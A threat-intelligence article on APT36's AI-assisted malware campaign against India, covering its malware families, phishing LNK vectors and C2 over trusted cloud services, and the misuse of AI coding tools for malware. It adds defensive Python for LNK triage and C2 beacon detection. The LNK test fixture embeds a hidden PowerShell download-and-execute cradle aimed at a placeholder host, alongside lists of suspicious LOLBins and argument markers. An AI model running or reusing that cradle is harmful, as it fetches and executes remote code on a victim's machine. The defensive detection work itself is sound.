Transparent Tribe Embraces AI for Malware Production
Transparent Tribe, a Pakistan-aligned threat actor also tracked as APT36, has adopted AI-powered coding tools to run a campaign against India that delivers a wide range of malware implants. According to Bitdefender, the shift is part of a broader trend toward AI-assisted industrialization of malware, which lets the group flood target environments with a high volume of disposable binaries written in several different languages.
Approach and Tools
The campaign uses lesser-known programming languages such as Nim, Zig, and Crystal, and relies on trusted services such as Slack, Discord, Supabase, and Google Sheets for command-and-control and exfiltration so that the traffic blends into legitimate network activity. Bitdefender calls the strategy Distributed Denial of Detection (DDoD): the goal is to overwhelm standard defensive telemetry with sheer sample volume rather than to bypass detection through technical sophistication.
Targeting and Infection Vectors
The attacks primarily target the Indian government and its embassies, with APT36 using LinkedIn to identify high-value targets. Infection chains typically start with phishing emails that carry Windows shortcut files (LNKs) inside ZIP archives or ISO images, or PDF lures that redirect the user to an attacker-controlled website from which the malware is downloaded.
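A triage check a defender would want for the LNK-in-archive vector described above: pull the target and command-line arguments out of a shortcut file and flag shortcuts that launch an interpreter or LOLBin with download-style arguments. This is an added example, not code from the article or from Bitdefender's report. It parses the ShellLinkHeader, LinkTargetIDList, LinkInfo and StringData sections of the MS-SHLLINK format; the suspicious-target and argument-marker lists are the example's own heuristics, and both sample shortcuts and the ZIP around them are constructed inline rather than taken from the campaign.

```python
import io
import struct
import zipfile

# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_IDLIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# CLSID 00021401-0000-0000-C000-000000000046 in its on-disk little-endian layout.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Example heuristics (assumption, not from the article): interpreters and
# LOLBins commonly launched by malicious shortcuts, and argument fragments
# that usually mean "hide the window and fetch something".
SUSPICIOUS_TARGETS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                      "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
SUSPICIOUS_ARG_MARKERS = ("-w hidden", "-windowstyle hidden", "-enc", "-nop",
                          "http://", "https://", "iex", "downloadstring", "bitsadmin")


def parse_lnk(data):
    """Return the StringData fields (name, relative_path, working_dir, arguments, icon_location)."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                   # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage_lnk(data):
    """Flag a shortcut whose RelativePath target or arguments look like a loader stage."""
    fields = parse_lnk(data)
    target = fields.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = fields.get("arguments", "")
    reasons = []
    if target in SUSPICIOUS_TARGETS:
        reasons.append("target is an interpreter or LOLBin: " + target)
    reasons += ["argument marker: " + m for m in SUSPICIOUS_ARG_MARKERS if m in args.lower()]
    return {"target": target, "arguments": args, "suspicious": bool(reasons), "reasons": reasons}


def triage_zip(zip_bytes):
    """Triage every .lnk entry of an in-memory ZIP, the delivery container named in the article."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk"):
                r = triage_lnk(zf.read(info))
                r["entry"] = info.filename
                results.append(r)
    return results


def build_lnk(target, args, workdir=""):
    """Construct a minimal but well-formed shortcut so the example runs offline (test data only)."""
    flags = HAS_LINK_TARGET_IDLIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if workdir:
        flags |= HAS_WORKING_DIR
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + bytes(0x4C - 24)
    idlist = struct.pack("<H", 2) + b"\x00\x00"       # IDListSize + TerminalID only
    strings = [target] + ([workdir] if workdir else []) + [args]
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return header + idlist + body


# Constructed samples: a PowerShell download cradle and a harmless document shortcut.
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       '-w hidden -nop -c "iex (New-Object Net.WebClient)'
                       ".DownloadString('https://example.invalid/x')\"", "%TEMP%")
BENIGN_LNK = build_lnk(r"..\..\Documents\report.pdf", "")


def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invitation.pdf.lnk", SAMPLE_LNK)
        zf.writestr("report.lnk", BENIGN_LNK)
    return buf.getvalue()


if __name__ == "__main__":
    for r in triage_zip(build_sample_zip()):
        print(r["entry"], "->", r["target"], "SUSPICIOUS" if r["suspicious"] else "ok", r["reasons"])
```

One caveat: the parser reads the target from RelativePath, which a crafted shortcut may omit; the authoritative target lives in the LinkTargetIDList, which this example only skips, so a shortcut with no RelativePath should still be inspected by hand or with a fuller parser. For ISO delivery, mount or extract the image and feed the same triage_lnk to each .lnk it contains.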
Malware Families and Tools
Several malware families and tools have been observed in the attacks:
- Warcode: A custom shellcode loader written in Crystal that deploys a Havoc agent.
- NimShellcodeLoader: An experimental counterpart to Warcode that deploys a Cobalt Strike beacon.
- CreepDropper: A .NET malware that delivers and installs additional payloads, including SHEETCREEP and MAILCREEP.
- SupaServ: A Rust-based backdoor that uses Supabase and Firebase for communication.
- LuminousStealer: A Rust-based infostealer that uses Firebase and Google Drive for data exfiltration.
- CrystalShell: A backdoor written in Crystal that targets multiple operating systems and uses Discord for C2.
- ZigShell: A counterpart to CrystalShell written in Zig, using Slack for C2.
- CrystalFile: A command interpreter written in Crystal that executes commands from a monitored file.
- LuminousCookies: A Rust-based injector that exfiltrates sensitive information from Chromium-based browsers.
- BackupSpy: A Rust-based utility that monitors the local file system and external media for high-value data.
- ZigLoader: A specialized loader written in Zig that decrypts and executes shellcode in memory.
- Gate Sentinel Beacon: A customized version of the open-source GateSentinel C2 framework.
Implications and Countermeasures
Bitdefender warns that the real threat of AI-assisted malware is the industrialization of attacks: threat actors can scale their operations quickly and with far less effort. The adoption of exotic programming languages, combined with the abuse of trusted services to hide command-and-control traffic inside legitimate network activity, is what makes these campaigns effective.
While AI-assisted development increases the volume of malware samples, the resulting tools are often unstable and riddled with logical errors. The volume is aimed at signature-based detection, which modern endpoint security has largely superseded, so behavioral and network-level monitoring remain the relevant controls.
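Because the campaign hides C2 and exfiltration inside traffic to Slack, Discord, Supabase, Firebase and Google APIs, the network-level check a practitioner would want is process-aware rather than domain-based: which process on which host is talking to those services, and how regularly. The following is an added example, not code from the article or from Bitdefender; it runs over constructed endpoint network events (a JSON line per connection with host, process image and destination hostname, modelled loosely on Sysmon event ID 3 fields). The service-to-domain mapping, the expected-client allowlist and the beaconing thresholds are the example's own assumptions.

```python
import json
import statistics
from collections import defaultdict
from datetime import datetime

# Assumed mapping of the trusted services named in the article to the hostnames
# a client would contact. Extend to match what your proxy or DNS logs actually show.
TRUSTED_SERVICE_DOMAINS = {
    "slack": ("slack.com", "hooks.slack.com"),
    "discord": ("discord.com", "discordapp.com"),
    "supabase": ("supabase.co",),
    "firebase": ("firebaseio.com", "firestore.googleapis.com"),
    "google": ("sheets.googleapis.com", "www.googleapis.com", "drive.google.com", "docs.google.com"),
}
# Assumed allowlist: the only non-browser processes expected to reach each service.
EXPECTED_CLIENTS = {"slack": {"slack.exe"}, "discord": {"discord.exe"},
                    "supabase": set(), "firebase": set(), "google": set()}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}


def classify_service(hostname):
    """Map a destination hostname to one of the trusted services, or None."""
    h = hostname.lower().rstrip(".")
    for service, suffixes in TRUSTED_SERVICE_DOMAINS.items():
        if any(h == s or h.endswith("." + s) for s in suffixes):
            return service
    return None


def basename(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def looks_like_beacon(timestamps, min_count=4, max_cv=0.2):
    """True when inter-connection intervals are regular: coefficient of variation <= max_cv."""
    if len(timestamps) < min_count:
        return False
    ts = sorted(timestamps)
    intervals = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(intervals)
    return mean > 0 and statistics.pstdev(intervals) / mean <= max_cv


def detect(lines):
    """Alert on (host, process, service) tuples that are unexpected clients or beacon-like."""
    by_key = defaultdict(list)
    for line in lines:
        e = json.loads(line)
        service = classify_service(e["dest_host"])
        if service is None:            # not one of the abused services; ignore
            continue
        ts = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
        by_key[(e["host"], basename(e["image"]), service)].append(ts)
    alerts = []
    for (host, proc, service), stamps in by_key.items():
        reasons = []
        if proc not in BROWSERS and proc not in EXPECTED_CLIENTS[service]:
            reasons.append("unexpected process %s contacting %s" % (proc, service))
        if looks_like_beacon(stamps):
            reasons.append("regular interval across %d connections" % len(stamps))
        if reasons:
            alerts.append({"host": host, "process": proc, "service": service,
                           "connections": len(stamps), "reasons": reasons})
    return alerts


# Constructed sample events: a browser and the official Slack client behaving normally,
# and an unknown binary in a world-writable directory polling a Slack webhook host about
# once a minute, plus one read of a Google Sheets endpoint.
SAMPLE_EVENTS = [
    '{"ts":"2026-03-10T09:00:10Z","host":"ws-12","image":"C:\\\\Program Files\\\\Google\\\\Chrome\\\\chrome.exe","dest_host":"sheets.googleapis.com"}',
    '{"ts":"2026-03-10T09:00:40Z","host":"ws-12","image":"C:\\\\Program Files\\\\Google\\\\Chrome\\\\chrome.exe","dest_host":"docs.google.com"}',
    '{"ts":"2026-03-10T09:00:45Z","host":"ws-12","image":"C:\\\\Users\\\\a.user\\\\AppData\\\\Local\\\\slack\\\\slack.exe","dest_host":"slack.com"}',
    '{"ts":"2026-03-10T09:00:00Z","host":"ws-07","image":"C:\\\\Users\\\\Public\\\\update.exe","dest_host":"hooks.slack.com"}',
    '{"ts":"2026-03-10T09:01:02Z","host":"ws-07","image":"C:\\\\Users\\\\Public\\\\update.exe","dest_host":"hooks.slack.com"}',
    '{"ts":"2026-03-10T09:01:59Z","host":"ws-07","image":"C:\\\\Users\\\\Public\\\\update.exe","dest_host":"hooks.slack.com"}',
    '{"ts":"2026-03-10T09:03:01Z","host":"ws-07","image":"C:\\\\Users\\\\Public\\\\update.exe","dest_host":"hooks.slack.com"}',
    '{"ts":"2026-03-10T09:04:00Z","host":"ws-07","image":"C:\\\\Users\\\\Public\\\\update.exe","dest_host":"hooks.slack.com"}',
    '{"ts":"2026-03-10T09:04:30Z","host":"ws-07","image":"C:\\\\Users\\\\Public\\\\update.exe","dest_host":"sheets.googleapis.com"}',
    '{"ts":"2026-03-10T09:05:00Z","host":"ws-07","image":"C:\\\\Windows\\\\System32\\\\svchost.exe","dest_host":"update.microsoft.com"}',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The process allowlist is what makes this workable against DDoD: a pure domain or signature approach sees only reputable hosts, whereas a process that is neither a browser nor the service's own client has no business reaching these APIs at all. The periodicity test is deliberately a secondary signal; browser sessions can also poll on a schedule, so treat it as a reason to prioritize rather than a verdict on its own.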
Original article: https://thehackernews.com/2026/03/transparent-tribe-uses-ai-to-mass.html
